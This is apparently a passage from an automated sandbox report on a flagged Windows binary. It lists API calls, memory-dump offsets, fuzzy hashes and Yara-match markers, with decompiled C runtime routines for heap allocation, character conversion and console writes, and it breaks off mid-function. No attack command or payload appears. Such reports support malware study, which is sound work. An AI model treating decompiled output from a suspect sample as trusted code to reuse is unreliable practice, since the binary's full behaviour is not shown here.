                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 411323be5b163240cd09910719cbccd9274e26801ae701e4e561aaa3108ca3e6
                • Instruction ID: 2525e46116370a7ed3b887a2e8df50ed29f95dc4e5b48d6fb29a38d7b72e0a03
                • Opcode Fuzzy Hash: 411323be5b163240cd09910719cbccd9274e26801ae701e4e561aaa3108ca3e6
                • Instruction Fuzzy Hash: 881103B18006498FCB20CF99C484BDEBBF4EF48324F10842AD969B7340D778A949CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 007F962E
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: c2295915d92470cfce3145ead6daaa79ed55ed7fce043920f3105f4fa3e53c50
                • Instruction ID: 8a95048b60956b0f572711f12c00668ea1b48a87c300ac1418555ff4ebe79248
                • Opcode Fuzzy Hash: c2295915d92470cfce3145ead6daaa79ed55ed7fce043920f3105f4fa3e53c50
                • Instruction Fuzzy Hash: 8D11E0B5D006498FDB10CF9AC444BDEFBF4AB88324F10852AD929B7700C378A546CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 007FFE9D
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 4978ed9b7185bf2139b3a565e6b5305d33a0e6e73a609a6cb57c10a6e9f49a53
                • Instruction ID: 786445aa5a431b5b014d0f5aeec28dcc4c69733eb87ee3bf6faaadc8f794d570
                • Opcode Fuzzy Hash: 4978ed9b7185bf2139b3a565e6b5305d33a0e6e73a609a6cb57c10a6e9f49a53
                • Instruction Fuzzy Hash: 9A11F2B58003489FDB20CF99D585BEEBBF4EB49324F10851AE919B7301C378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051B226A,?,00000000,?), ref: 051BC435
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 91c95962f1a16e53f197f736ac63d5e09513531fc47b1bbf0eecf35691a18fcd
                • Instruction ID: 065954fe1529e85f31ecd12fc4fb3f23494378e67fc99c1762c31b4e6595e124
                • Opcode Fuzzy Hash: 91c95962f1a16e53f197f736ac63d5e09513531fc47b1bbf0eecf35691a18fcd
                • Instruction Fuzzy Hash: F711D6B58006499FDB10CF99D485BDEFBF8FB58314F108419E555B7600C378A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 335bdaf5b35fba125854f27887848d356d000a03ed43295d37f71078a0ef9eaa
                • Instruction ID: 7b74625922d8a7db26bcd4adbcdc6fa37562fb7bac5149043a3b4a4702d90cc3
                • Opcode Fuzzy Hash: 335bdaf5b35fba125854f27887848d356d000a03ed43295d37f71078a0ef9eaa
                • Instruction Fuzzy Hash: 5911C2B58046499FDB10CF99D885BDEBBF8EB48314F20881AE919A7600C378A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.321291512.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 68ee3e247de1090f15dcaa5bee639ac182933b736fc0fe81a0e724665b6f24b8
                • Instruction ID: f608eea0ce8c5d78b8468483f774aa8bc689ddb7f93edfb030357450fe38cbc4
                • Opcode Fuzzy Hash: 68ee3e247de1090f15dcaa5bee639ac182933b736fc0fe81a0e724665b6f24b8
                • Instruction Fuzzy Hash: D211E0B1C046998FDB10CF9AD448BDEBBF4AB48214F10852AE519B7600D378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 007FFE9D
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: d421c5110a9c50cc4582ff625ce70d224fdda89fe4252c8cbd84fffb54e07420
                • Instruction ID: 4e826457b4cd412ff8d50ef7f71b77356a9cc7a72f00d32d042e02ff1a1512ae
                • Opcode Fuzzy Hash: d421c5110a9c50cc4582ff625ce70d224fdda89fe4252c8cbd84fffb54e07420
                • Instruction Fuzzy Hash: 8511E5B59006499FDB10CF99D485BDEFBF8EB48324F10851AE919B7340C378A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.321291512.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 296a488a5527eb406c7dfd7394686967da5ca042b96459c011d677d3cd6a98c9
                • Instruction ID: 33d537529a1188f4c2abec7c19b19c50c41cef356877934b51ad1f0ec35f140f
                • Opcode Fuzzy Hash: 296a488a5527eb406c7dfd7394686967da5ca042b96459c011d677d3cd6a98c9
                • Instruction Fuzzy Hash: D711CEB5D046598FCB10CF9AD448BDEFBF4AB48314F10852AE829B7600D378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			// Decompiled heap-allocation wrapper (malloc-style). Comments added here are
                			// inferred from the control flow; callee names are the sandbox's own labels.
                			E00403E3D(void* __ecx, long _a4) {
                				void* _t4;
                				void* _t6;
                				void* _t7;
                				long _t8;
                
                				_t7 = __ecx;
                				_t8 = _a4;
                				if(_t8 > 0xffffffe0) {
                					// Oversized request: report ENOMEM (0xc) through the pointer E00404831()
                					// returns (likely the CRT errno accessor) and fail
                					L7:
                					 *((intOrPtr*)(E00404831())) = 0xc;
                					__eflags = 0;
                					return 0;
                				}
                				if(_t8 == 0) {
                					// Zero-byte requests are rounded up to one byte
                					_t8 = _t8 + 1;
                				}
                				while(1) {
                					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                					if(_t4 != 0) {
                						break;
                					}
                					// Allocation failed: give up unless the handler chain (E00403829 / E004068FD,
                					// likely the CRT new-handler path) reports that a retry is worthwhile
                					__eflags = E00403829();
                					if(__eflags == 0) {
                						goto L7;
                					}
                					_t6 = E004068FD(_t7, __eflags, _t8);
                					_pop(_t7);
                					__eflags = _t6;
                					if(_t6 == 0) {
                						goto L7;
                					}
                				}
                				return _t4;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 68a99d9d57825be038b372b30d0560a88d3843ecf01aa92e0318117cf208c57d
                • Instruction ID: d1331867fc0bf5dbbdb2f0a8c82fab85fc81604be97f9955a995b94989ac26dc
                • Opcode Fuzzy Hash: 68a99d9d57825be038b372b30d0560a88d3843ecf01aa92e0318117cf208c57d
                • Instruction Fuzzy Hash: 0E2103B1508240DFCB21DF10D8C0B2ABF65FB88354F25C569E9494B20AC73ADC55CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 939d296a90a26de2a68884734de34f0975b30bf678073fe8d9aace1e65e0ae78
                • Instruction ID: 0e6d90058ac7aecbd70dd29b27756b1eceb5f386c5a5fb148ebc1ed5308918dd
                • Opcode Fuzzy Hash: 939d296a90a26de2a68884734de34f0975b30bf678073fe8d9aace1e65e0ae78
                • Instruction Fuzzy Hash: 2A2106B1604240DFCB21DF14D8C0B2ABF65FB88318F24C569E9454B206C73ADC25C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318190929.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c38f34b94e51f67c8d73e2c63808ce0dd82c6a041f880d084f8ef0b1bfbbcf6b
                • Instruction ID: ccd447dac173ea1a33a7b71b3b2ae407ee24a352ba22f36da679e3a36d753cb9
                • Opcode Fuzzy Hash: c38f34b94e51f67c8d73e2c63808ce0dd82c6a041f880d084f8ef0b1bfbbcf6b
                • Instruction Fuzzy Hash: 222107B0508244EFDB21CF50D9C0B6ABB65FB88315F24C56DED094B246C7BADC4ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318190929.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 885a6062b5ac4626e789b620cb79f4d7182a18cf2f90cfc06a264ecbf5b8219e
                • Instruction ID: 4119254f5593968e01b0b275db8806b19bc5ef21a0f68814a7f24acd624877dd
                • Opcode Fuzzy Hash: 885a6062b5ac4626e789b620cb79f4d7182a18cf2f90cfc06a264ecbf5b8219e
                • Instruction Fuzzy Hash: E121C170608244DFDB34DF14D9C4B6ABB65EB88315F24C569E90D4B286C7BADC0ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318190929.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 930deed4b9df65f417f79b1a90de5cb479ea6d685861c9b0494efb552278d0d7
                • Instruction ID: 3f7093a39e137c5b5aa3cf00d689242fcf97438e7011c07bbaf946cd1bff179b
                • Opcode Fuzzy Hash: 930deed4b9df65f417f79b1a90de5cb479ea6d685861c9b0494efb552278d0d7
                • Instruction Fuzzy Hash: 642180755083809FCB12CF24D994B55BF71EB46314F28C5EAD8498B2A7C37ADC0ACB62
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction ID: 8fb6ae5c8a796a3bc5c073c3f53c361c8b1e469530d69f24dd43a1a50e5e6b27
                • Opcode Fuzzy Hash: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction Fuzzy Hash: 8B11D376504280DFCB11CF10D9C4B1AFF71FB84324F24C6A9D8494B616C33AD96ACBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction ID: 1a0b40f0c7362b249b3bf7b79414a67f55e71543d86b4d101e35febb99ab7bbb
                • Opcode Fuzzy Hash: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction Fuzzy Hash: 6011E676504280DFCF11CF10D9C4B16BF71FB84320F25C6A9E8494B216C33AD85ACBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318190929.000000000075D000.00000040.00000001.sdmp, Offset: 0075D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction ID: 7d5587b6d6d1e441952c977745383c18c207c0e7e98e4e826da16ecf627dd850
                • Opcode Fuzzy Hash: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction Fuzzy Hash: 80119D75904280DFDB21CF10D5C4B55FBA1FB84324F24C6AEDC494B656C37AD84ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 17f95e9cd78ca0b3139973e4e7d1454ad31185b1f23d3103c3716dcc42e4cf32
                • Instruction ID: 0379377364e1dbc403bb3190c8463d9c00239e540d0ff874be5983405061be6a
                • Opcode Fuzzy Hash: 17f95e9cd78ca0b3139973e4e7d1454ad31185b1f23d3103c3716dcc42e4cf32
                • Instruction Fuzzy Hash: B501A271508384AAE7304A25DC84B6BBB98EF41368F28C15AFD985B256C37DDC45C7B1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318152305.000000000074D000.00000040.00000001.sdmp, Offset: 0074D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 16eb9128a219bdba135b87bff7254cb71eb7de2fc8866a219e9ca1bd8c7dcaa6
                • Instruction ID: 8240509c4816e2bddb9e8cc1f833de0dd32bc6b1ee38a4c69ce2e8e9898c98c6
                • Opcode Fuzzy Hash: 16eb9128a219bdba135b87bff7254cb71eb7de2fc8866a219e9ca1bd8c7dcaa6
                • Instruction Fuzzy Hash: 4BF06271404284AEE7208E15DC84B67FB98EB41764F18C55AED985B296C3799C44CAB1
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                				signed int _v8;
                				int _v12;
                				void* _v24;
                				signed int _t49;
                				signed int _t54;
                				int _t56;
                				signed int _t58;
                				short* _t60;
                				signed int _t64;
                				short* _t68;
                				int _t76;
                				short* _t79;
                				signed int _t85;
                				signed int _t88;
                				void* _t93;
                				void* _t94;
                				int _t96;
                				short* _t99;
                				int _t101;
                				int _t103;
                				signed int _t104;
                				short* _t105;
                				void* _t108;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t49 =  *0x412014; // 0x3bac56c0
                				_v8 = _t49 ^ _t104;
                				_t101 = _a20;
                				if(_t101 > 0) {
                					_t76 = E004080DB(_a16, _t101);
                					_t108 = _t76 - _t101;
                					_t4 = _t76 + 1; // 0x1
                					_t101 = _t4;
                					if(_t108 >= 0) {
                						_t101 = _t76;
                					}
                				}
                				_t96 = _a32;
                				if(_t96 == 0) {
                					_t96 =  *( *_a4 + 8);
                					_a32 = _t96;
                				}
                				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                				_v12 = _t54;
                				if(_t54 == 0) {
                					L38:
                					E004018CC();
                					return _t54;
                				} else {
                					_t93 = _t54 + _t54;
                					_t83 = _t93 + 8;
                					asm("sbb eax, eax");
                					if((_t93 + 0x00000008 & _t54) == 0) {
                						_t79 = 0;
                						__eflags = 0;
                						L14:
                						if(_t79 == 0) {
                							L36:
                							_t103 = 0;
                							L37:
                							E004063D5(_t79);
                							_t54 = _t103;
                							goto L38;
                						}
                						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                						_t119 = _t56;
                						if(_t56 == 0) {
                							goto L36;
                						}
                						_t98 = _v12;
                						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                						_t103 = _t58;
                						if(_t103 == 0) {
                							goto L36;
                						}
                						if((_a12 & 0x00000400) == 0) {
                							_t94 = _t103 + _t103;
                							_t85 = _t94 + 8;
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							__eflags = _t85 & _t58;
                							if((_t85 & _t58) == 0) {
                								_t99 = 0;
                								__eflags = 0;
                								L30:
                								__eflags = _t99;
                								if(__eflags == 0) {
                									L35:
                									E004063D5(_t99);
                									goto L36;
                								}
                								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                								__eflags = _t60;
                								if(_t60 == 0) {
                									goto L35;
                								}
                								_push(0);
                								_push(0);
                								__eflags = _a28;
                								if(_a28 != 0) {
                									_push(_a28);
                									_push(_a24);
                								} else {
                									_push(0);
                									_push(0);
                								}
                								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                								__eflags = _t103;
                								if(_t103 != 0) {
                									E004063D5(_t99);
                									goto L37;
                								} else {
                									goto L35;
                								}
                							}
                							_t88 = _t94 + 8;
                							__eflags = _t94 - _t88;
                							asm("sbb eax, eax");
                							_t64 = _t58 & _t88;
                							_t85 = _t94 + 8;
                							__eflags = _t64 - 0x400;
                							if(_t64 > 0x400) {
                								__eflags = _t94 - _t85;
                								asm("sbb eax, eax");
                								_t99 = E00403E3D(_t85, _t64 & _t85);
                								_pop(_t85);
                								__eflags = _t99;
                								if(_t99 == 0) {
                									goto L35;
                								}
                								 *_t99 = 0xdddd;
                								L28:
                								_t99 =  &(_t99[4]);
                								goto L30;
                							}
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							E004018E0();
                							_t99 = _t105;
                							__eflags = _t99;
                							if(_t99 == 0) {
                								goto L35;
                							}
                							 *_t99 = 0xcccc;
                							goto L28;
                						}
                						_t68 = _a28;
                						if(_t68 == 0) {
                							goto L37;
                						}
                						_t123 = _t103 - _t68;
                						if(_t103 > _t68) {
                							goto L36;
                						}
                						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                						if(_t103 != 0) {
                							goto L37;
                						}
                						goto L36;
                					}
                					asm("sbb eax, eax");
                					_t70 = _t54 & _t93 + 0x00000008;
                					_t83 = _t93 + 8;
                					if((_t54 & _t93 + 0x00000008) > 0x400) {
                						__eflags = _t93 - _t83;
                						asm("sbb eax, eax");
                						_t79 = E00403E3D(_t83, _t70 & _t83);
                						_pop(_t83);
                						__eflags = _t79;
                						if(__eflags == 0) {
                							goto L36;
                						}
                						 *_t79 = 0xdddd;
                						L12:
                						_t79 =  &(_t79[4]);
                						goto L14;
                					}
                					asm("sbb eax, eax");
                					E004018E0();
                					_t79 = _t105;
                					if(_t79 == 0) {
                						goto L36;
                					}
                					 *_t79 = 0xcccc;
                					goto L12;
                				}
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                • Opcode Fuzzy Hash: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed char _v15;
                				char _v16;
                				void _v24;
                				short _v28;
                				char _v31;
                				void _v32;
                				long _v36;
                				intOrPtr _v40;
                				void* _v44;
                				signed int _v48;
                				signed char* _v52;
                				long _v56;
                				int _v60;
                				void* __ebx;
                				signed int _t78;
                				signed int _t80;
                				int _t86;
                				void* _t93;
                				long _t96;
                				void _t104;
                				void* _t111;
                				signed int _t115;
                				signed int _t118;
                				signed char _t123;
                				signed char _t128;
                				intOrPtr _t129;
                				signed int _t131;
                				signed char* _t133;
                				intOrPtr* _t136;
                				signed int _t138;
                				void* _t139;
                
                				_t78 =  *0x412014; // 0x3bac56c0
                				_v8 = _t78 ^ _t138;
                				_t80 = _a8;
                				_t118 = _t80 >> 6;
                				_t115 = (_t80 & 0x0000003f) * 0x30;
                				_t133 = _a12;
                				_v52 = _t133;
                				_v48 = _t118;
                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                				_v40 = _a16 + _t133;
                				_t86 = GetConsoleCP();
                				_t136 = _a4;
                				_v60 = _t86;
                				 *_t136 = 0;
                				 *((intOrPtr*)(_t136 + 4)) = 0;
                				 *((intOrPtr*)(_t136 + 8)) = 0;
                				while(_t133 < _v40) {
                					_v28 = 0;
                					_v31 =  *_t133;
                					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                					_t123 =  *(_t129 + _t115 + 0x2d);
                					if((_t123 & 0x00000004) == 0) {
                						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                							_push(1);
                							_push(_t133);
                							goto L8;
                						} else {
                							if(_t133 >= _v40) {
                								_t131 = _v48;
                								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                							} else {
                								_t111 = E00407222( &_v28, _t133, 2);
                								_t139 = _t139 + 0xc;
                								if(_t111 != 0xffffffff) {
                									_t133 =  &(_t133[1]);
                									goto L9;
                								}
                							}
                						}
                					} else {
                						_t128 = _t123 & 0x000000fb;
                						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                						_push(2);
                						_v15 = _t128;
                						 *(_t129 + _t115 + 0x2d) = _t128;
                						_push( &_v16);
                						L8:
                						_push( &_v28);
                						_t93 = E00407222();
                						_t139 = _t139 + 0xc;
                						if(_t93 != 0xffffffff) {
                							L9:
                							_t133 =  &(_t133[1]);
                							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                							_v56 = _t96;
                							if(_t96 != 0) {
                								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                									L19:
                									 *_t136 = GetLastError();
                								} else {
                									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                									if(_v36 >= _v56) {
                										if(_v31 != 0xa) {
                											goto L16;
                										} else {
                											_t104 = 0xd;
                											_v32 = _t104;
                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                												goto L19;
                											} else {
                												if(_v36 >= 1) {
                													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                													goto L16;
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                					}
                					goto L20;
                					L16:
                				}
                				L20:
                				E004018CC();
                				return _t136;
                			}

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                • __fassign.LIBCMT ref: 004082E3
                • __fassign.LIBCMT ref: 004082FE
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _t10;
                				int _t12;
                				int _t18;
                				signed int _t20;
                
                				_t10 =  *0x412014; // 0x3bac56c0
                				_v8 = _t10 ^ _t20;
                				_v12 = _v12 & 0x00000000;
                				_t12 =  &_v12;
                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                				if(_t12 != 0) {
                					_t12 = GetProcAddress(_v12, "CorExitProcess");
                					_t18 = _t12;
                					if(_t18 != 0) {
                						E0040C15C();
                						_t12 =  *_t18(_a4);
                					}
                				}
                				if(_v12 != 0) {
                					_t12 = FreeLibrary(_v12);
                				}
                				E004018CC();
                				return _t12;
                			}

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                				signed int _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v24;
                				char _v28;
                				void* _v40;
                				void* __ebx;
                				void* __edi;
                				signed int _t34;
                				signed int _t40;
                				int _t45;
                				int _t52;
                				void* _t53;
                				void* _t55;
                				int _t57;
                				signed int _t63;
                				int _t67;
                				short* _t71;
